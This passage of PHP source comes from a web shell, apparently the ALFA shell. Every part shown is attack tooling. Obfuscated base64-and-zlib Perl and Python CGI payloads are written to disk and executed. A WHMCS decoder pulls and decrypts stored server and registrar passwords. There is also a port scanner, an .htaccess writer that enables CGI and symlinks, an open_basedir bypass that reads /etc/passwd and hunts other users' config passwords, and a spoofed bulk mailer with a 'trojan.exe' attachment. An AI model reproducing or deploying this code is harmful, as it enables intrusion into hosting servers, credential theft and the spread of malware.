  5284. $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
  5285. $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("eJylF9ty2zb22foKDLxbUqurFTvN6Na6Xqf1bNNmErcvtkcDEqCICQlwQdC26vF++54DkBLVaOO2a8/YBM79fmDNZto5knmhjSXxWtpo5v8NhWJRJsJuRzzGorCAVbCy7NSo5absA15fl/21sAjpR6wUr0/7lckyGXUSo3NiZS5IQ2FNgueGgzUsFhGLP3nUj9ZItb76uUFvzjWjBrkBFwC1K1CtIxOiS9D2XhqthikrV5/EJqQfLz5cvb9e/XT+7pJ2QfkyNrKwioFCixbBzR7iXUdkpfg9NqUdLhLCsoRd5DyMkd1RnMqMr0rLpeqT7UFX1rMvdCHUBHD3UYdxpkt06tGREWWVIXabeGgE4+EeEd62qWxlFPHEnUSbHDms5fCtFBn/aLVha8SMcw4AhA8hPvcsq0QYxEG3w6X5HMABAH4EIjDNk/owDiv170pbEfrgDqPXp1zEmosQsLqOCBgCkWf7EhFgdVuS/MfNePrqjiwWJIg5CdC3yqvgzqSHEuBvMMNvhOB38cADwLyojBHK/tNJbwKE5F3wZJFB0oTBrQr6gTdQaeu4MQWcd7SBA0hFMh2zrAwxwAc5Byj2AOs6a0DCC1z32YIqHYjdyjsPs4bZdMiiEv+HdEi7nfeQ/QVmSXBD5nCvoI42mVjQWGfaTI/Hr74+GY9ndBn06jrEsFalMGG3F8xHSLL89gXKvXK4/PDr5Ye6HLYcDsqeRIk4OXMcdmbtSO7+FqDPVysso9XKRXi1yplUqxWG2ZUwoRdaWSAd2E0hpsSKRztKbZ7dmltFG6RgjlfLeQrVsZxbaTOxvICE4iTakPMf356Ta3H+jgzIxfdX5P3GplrNRx5tngvLoMaYKYVd0F+u3w7e0OXcWbL8xxNUVyaVmCqtxOz5eLVKUNuqeEoyzeyUGLlO7UzfCwMXD1OSSs6FmnkPkOPJWZKAEx8kt+mUnJyOi8cZlyWkx2YKoUfWgwji/2mGhg12fAQUSlHKcvaQSisG4LEYrFf6wbBi9pyxSGRPOTNrqQZOBWCOvIHeSsimAcvkWk1JDupkYhZpwwXoc1I8klJnkkOD4DPsl2ujK8Wn2EAVCMEgAfbjoEwZRz3G8HsKVMfjy1fj0/Oa08AwLqtyiqDGuMkZKvBnzIgrU6KXCg0xFOZ/OMYbi+NBq/VTW2e0oQ5DJhK79bLzxLNURWVvMGsWZRXl0t491QIbeW1eLr6H3VTHEjqnWotDDng+hoby9Je4Nb77GlU+EM8D0grGYVCsB7WTSssMYJ99DhGoCd4/Y1AgtOwJxoL8TdT67aV2S/uW8o3gli5te47fup9G8PTkNaDVxX/2Jj47e1MbCI3k77siYZXVs2doA67G5iNftZHmG6IVxJMvKNdxlUMuYrO6zAR+fre54uFtAK6+hRabAAK0zBkl0dpJXNDjsfuhxOrCu3JB4YSp0Tr6T6dW65wKdLq7QGcBM28adIJYYLIs5wn0IVKLgkDSJTTcaNdlwCOClIyTryB972UpYTki/3HX9enbNfS2bBjrfD6KoP3NR8gS7G8kWFyoiHfzgp5QUmuJ3qMkhlrC+gFHOz3xXDt+QSegqEUW/IA/2mxqOxKowwX9VRjOFKMEs8IzAcX2LD2eTC4nkzcO8nFnC7lYy20jjZa1KQR6tRKxBY9YTV6YG0hlOf4xje7LoJn5RJbkJ8hDt0m5YU9bzZ7L+2bU1DWDQZ5OMEudphc6z3GGTw/Npbr0YCz1UVSfNBPJ6wTMl/Ni+UUhe5XaiG2qjBj9UII3wfNlAUGKUxF/WtAEZrygtYlBIjMR4PDHTQuttG7RPjpCQIK7Wr2F3XjUO4TVGwqEQEHZK9gwtth9ksnSuhXiiJA2k5vt4a7jBGjj4NCPc6dAA3a0KKOBDvEDx52HEOCrWnsIbm8IDT/D727xqyxb4S2QtTYbWNBGuKwlqkHEbTjcYkNIHiIo8gcDbPfZ1wvwTgLcYfaCAMiNEHQDz9gdqy6cV4gwOhlPTrdk9W5xjVMvEVDOhPZgwoQNu26Pkn99N6T7+MF1KpxEQoNeonoB1BYrSVVg0wIeZRXHoixR+GaI66d/GpFL909qeAkIY5w3PUM4dY7q5XCbAR60XSnrJXfffc2u2z0sxPPB59i2ZkZNejYpPioOFOA8cp0OXg1a+am5oDaV4FV3GMKIxibFF9ZUYtaCpL8DySTcg0q+WNwGKbTuJ3fPh+5pAXdBr15xe8Ft8OyAcQ2MrGZhpUQZs0KEQuEb4ZcPV1DdBfQGCHcbu9vtzvZY/zFqvqOmBJMXKhWmgoDWBnPo/c8frylhMfp1AUHfvfsg+Mu52zGI2zGo3/waHpwSrwXdX35xGfY7ey8ge/QYH0rATxTi2rCJKdmX4v3ZgJuT79+vxluhyyVdfqXgoTBr/32RU+oVACu0ijOJbQsCGWuVSJPD8D03gmx0BYkOH99AMOtoApEL7uwZk5nUj1DX8WZbnX7QOfQ/HBUmxza4y8xDSbgbu38mGf+P2AOSd0wOL2cJq7B1mg44s+wPJ4TfVROcnHVXMPiYwBmEjt0+H9APzcPJLbZ70bpINbznCXO9BvckhzEfOe5NPtSzqVma3dbmw7eVjFFMcdh9aaHa6oRrlYT5bX64fvfjwjnItcOb8d0QMYC7dxDebmvFfdf5d7Ytif303E+4Oh28ln+xiL5AxD6X4FNut2jtMm7kdi6c/LB94iqKz8jgv11NVZo=")),\'<string>\',\'exec\'))';
  5286. if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
  5287. if(__write_file($name,$code)){
  5288. @chmod($name,0755);
  5289. echo '<iframe src="'.'cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
  5290. }
  5291. }
  5292. echo $div;
  5293. alfafooter();
  5294. }
  5295. function alfaWhmcs(){
  5296. alfahead();
  5297. echo '<div class=header>';
  5298. function decrypt($string,$cc_encryption_hash){
  5299. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  5300. $hash_key = _hash($key);
  5301. $hash_length = strlen ($hash_key);
  5302. $string = __ZGVjb2Rlcg($string);
  5303. $tmp_iv = substr ($string, 0, $hash_length);
  5304. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  5305. $iv = $out = '';
  5306. $c = 0;
  5307. while ($c < $hash_length)
  5308. {
  5309. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  5310. ++$c;
  5311. }
  5312. $key = $iv;
  5313. $c = 0;
  5314. while ($c < strlen ($string))
  5315. {
  5316. if (($c != 0 AND $c % $hash_length == 0))
  5317. {
  5318. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  5319. }
  5320. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  5321. ++$c;
  5322. }
  5323. return $out;
  5324. }
  5325. function _hash($string)
  5326. {
  5327. if(function_exists('sha1'))
  5328. {
  5329. $hash = sha1 ($string);
  5330. }
  5331. else
  5332. {
  5333. $hash = md5 ($string);
  5334. }
  5335. $out = '';
  5336. $c = 0;
  5337. while ($c < strlen ($hash))
  5338. {
  5339. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  5340. $c += 2;
  5341. }
  5342. return $out;
  5343. }
  5344. AlfaNum(8,9,10);
  5345. echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
  5346. <input type='hidden' name='form_action' value='2'>";
  5347. $table = array('td1' =>
  5348. array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  5349. 'td2' =>
  5350. array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  5351. 'td3' =>
  5352. array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  5353. 'td4' =>
  5354. array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  5355. 'td5' =>
  5356. array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
  5357. );
  5358. create_table($table);
  5359. echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
  5360. if($_POST['alfa5']!=''){
  5361. $db_host=($_POST['alfa7']);
  5362. $db_username=($_POST['alfa3']);
  5363. $db_password=($_POST['alfa4']);
  5364. $db_name=($_POST['alfa5']);
  5365. $cc_encryption_hash=($_POST['alfa6']);
  5366. echo __pre();
  5367. $conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
  5368. $query = mysqli_query($conn,"SELECT * FROM tblservers");
  5369. $num = mysqli_num_rows($query);
  5370. if ($num > 0){
  5371. for($i=0; $i <=$num-1; $i++){
  5372. $v = @mysqli_fetch_array($query);
  5373. $ipaddress = $v['ipaddress'];
  5374. $username = $v['username'];
  5375. $type = $v['type'];
  5376. $active = $v['active'];
  5377. $hostname = $v['hostname'];
  5378. echo("<center><table border='1'>");
  5379. $password = decrypt ($v['password'], $cc_encryption_hash);
  5380. echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
  5381. echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
  5382. echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
  5383. echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
  5384. echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
  5385. echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
  5386. echo "</table><br><br></center>";
  5387. }
  5388. $query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
  5389. $num1 = @mysqli_num_rows($query1);
  5390. if ($num1 > 0){
  5391. for($i=0; $i <=$num1 -1; $i++){
  5392. $v = mysqli_fetch_array($query1);
  5393. $registrar = $v['registrar'];
  5394. $setting = $v['setting'];
  5395. $value = decrypt($v['value'], $cc_encryption_hash);
  5396. if ($value==""){
  5397. $value=0;
  5398. }
  5399. echo("<center>Domain Reseller <br><center>");
  5400. echo("<center><table border='1'>");
  5401. echo("<tr><td><b><font color=\"#daf50c\">Register</font></td><td>$registrar</td></tr></b>");
  5402. echo("<tr><td><b><font color=\"#daf50c\">Setting</font></td><td>$setting</td></tr></b>");
  5403. echo("<tr><td><b><font color=\"#daf50c\">Value</font></td><td>$value</td></tr></b>");
  5404. echo "</table><br><br></center>";
  5405. }
  5406. }
  5407. }else{__alert('<font color="red">tblservers is Empty...!</font>');};
  5408. }
  5409. echo "</div>";
  5410. alfafooter();
  5411. }
  5412. function alfaportscanner(){
  5413. alfahead();
  5414. echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
  5415. <form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
  5416. <input type="hidden" name="y" value="phptools">
  5417. <div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
  5418. <div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
  5419. <div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
  5420. </form></center><br>';
  5421. $start = strip_tags($_POST['alfa2']);
  5422. $end = strip_tags($_POST['alfa3']);
  5423. $host = strip_tags($_POST['alfa4']);
  5424. if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
  5425. echo __pre();
  5426. $packetContent = "GET / HTTP/1.1\r\n\r\n";
  5427. if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
  5428. else{
  5429. $packetContent =str_replace(array("\r","\n"), "", $packetContent);
  5430. $packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
  5431. }
  5432. for($i = $start; $i<=$end; $i++){
  5433. $sock = @fsockopen($host, $i, $errno, $errstr, 3);
  5434. if($sock){
  5435. stream_set_timeout($sock, 5);
  5436. fwrite($sock, $packetContent."\r\n\r\n\x00");
  5437. $counter = 0;
  5438. $maxtry = 1;
  5439. $bin = "";
  5440. do{
  5441. $line = fgets($sock, 1024);
  5442. if(trim($line)=="")$counter++;
  5443. $bin .= $line;
  5444. }while($counter<$maxtry);
  5445. fclose($sock);
  5446. echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
  5447. echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
  5448. }
  5449. flush();
  5450. }
  5451. }
  5452. echo '</div>';
  5453. alfafooter();
  5454. }
  5455. function alfacgihtaccess($m,$d='', $symname=false){
  5456. $readme = "";
  5457. if($symname){$readme="\nReadmeName ".trim($symname);}
  5458. if($m=='cgi'){
  5459. $code = "#Coded By SUPERBONE X TEAM\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
  5460. }elseif($m=='sym'){
  5461. $code = "#Coded By SUPERBONE X TEAM\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
  5462. }elseif($m=='shtml'){
  5463. $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
  5464. }
  5465. @__write_file($d.'.htaccess',$code);
  5466. }
  5467. function alfabasedir(){
  5468. alfahead();
  5469. echo '<div class=header>
  5470. <center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
  5471. $passwd = _alfa_file('/etc/passwd');
  5472. if(is_array($passwd)){
  5473. $users = array();
  5474. $makepwd = alfaMakePwd();
  5475. $basedir = @ini_get('open_basedir');
  5476. $safe_mode = @ini_get('safe_mode');
  5477. if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
  5478. $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
  5479. alfaWriteTocgiapi("basedir.alfa",$bash);
  5480. $bash_users = alfaEx("cd alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
  5481. $users = json_decode($bash_users, true);
  5482. $x=count($users);
  5483. if($x>=2){array_pop($users);--$x;}
  5484. }
  5485. if(!$basedir&&!$safe_mode){
  5486. $x=0;
  5487. foreach($passwd as $str){
  5488. $pos = strpos($str,':');
  5489. $username = substr($str,0,$pos);
  5490. $dirz = str_replace("{user}", $username, $makepwd);
  5491. if(($username != '')){
  5492. if (@is_readable($dirz)){
  5493. array_push($users,$username);
  5494. $x++;
  5495. }}}
  5496. }
  5497. echo '<br><br>';
  5498. echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
  5499. echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
  5500. echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
  5501. foreach($users as $user){
  5502. if(empty($user))continue;
  5503. $path = str_replace("{user}", $user, $makepwd);
  5504. echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
  5505. }
  5506. }else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
  5507. echo '<br><br></b>';
  5508. echo '</div>';
  5509. alfafooter();
  5510. }
  5511. function alfamail(){
  5512. alfahead();
  5513. echo '<div class=header>';
  5514. AlfaNum(8,9,10);
  5515. echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
  5516. $table = array(
  5517. 'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
  5518. 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
  5519. 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
  5520. 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
  5521. 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
  5522. );
  5523. create_table($table);
  5524. echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
  5525. if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
  5526. $mail_to = $_POST['alfa1'];
  5527. $mail_from = $_POST['alfa2'];
  5528. $mail_subject = $_POST['alfa3'];
  5529. $mail_content = $_POST['alfa5'];
  5530. $count_mail = (int)$_POST['alfa6'];
  5531. $mail_attach = $_POST['alfa7'];
  5532. if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
  5533. if(!empty($mail_attach)&&@is_file($mail_attach)){
  5534. $file = $mail_attach;
  5535. $content = __read_file($file);
  5536. $content = chunk_split(__ZW5jb2Rlcg($content));
  5537. $uid = md5(uniqid(time()));
  5538. $filename = basename($file);
  5539. $headers = "From: ".$mail_from." <".$mail_from.">\r\n";
  5540. $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
  5541. $headers .= "Reply-To: ".$mail_from."\r\n";
  5542. $headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
  5543. $headers .= 'MIME-Version: 1.0' . "\r\n";
  5544. $headers .= 'X-Mailer: php' . "\r\n";
  5545. $mail_content = "--".$uid."\r\n";
  5546. $mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
  5547. $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
  5548. $mail_content .= $mail_content."\r\n\r\n";
  5549. $mail_content .= "--".$uid."\r\n";
  5550. $mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
  5551. $mail_content .= "Content-Transfer-Encoding: base64\r\n";
  5552. $mail_content.= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
  5553. $mail_content .= $content."\r\n\r\n";
  5554. $mail_content .= "--".$uid."--";
  5555. }else{
  5556. $headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
  5557. $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
  5558. $headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
  5559. $headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
  5560. $headers .= 'MIME-Version: 1.0' . "\r\n";
  5561. $headers .= 'X-Mailer: php' . "\r\n";
  5562. }
  5563. if(empty($count_mail)||$count_mail<1)$count_mail=1;
  5564. if(!empty($mail_from)){echo __pre();
  5565. for($i=1;$i<=$count_mail;$i++){
  5566. if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
  5567. }}else{__alert("Invalid Mail From !");}
  5568. }else{__alert("Invalid Mail To !");}
  5569. }
  5570. echo('</div>');
  5571. alfafooter();
  5572. }
  5573. function alfaziper(){
  5574. alfahead();
  5575. AlfaNum(8,9,10);
  5576. echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
  5577. <form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
  5578. <div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/>
  5579. <div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
  5580. <input type="submit" value=" " name="ziper" />
  5581. </form></center></p>';
  5582. if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
  5583. $dirzip = $_POST['alfa3'];
  5584. $zipfile = $_POST['alfa4'];
  5585. if (class_exists('ZipArchive')&&($GLOBALS['sys']!='unix'||!_alfa_can_runCommand(true,true))){
  5586. $code='if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\\\\',\'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();';
  5587. $newfunc = create_function('$source,$destination', $code);
  5588. if($newfunc($dirzip, $zipfile)){
  5589. echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
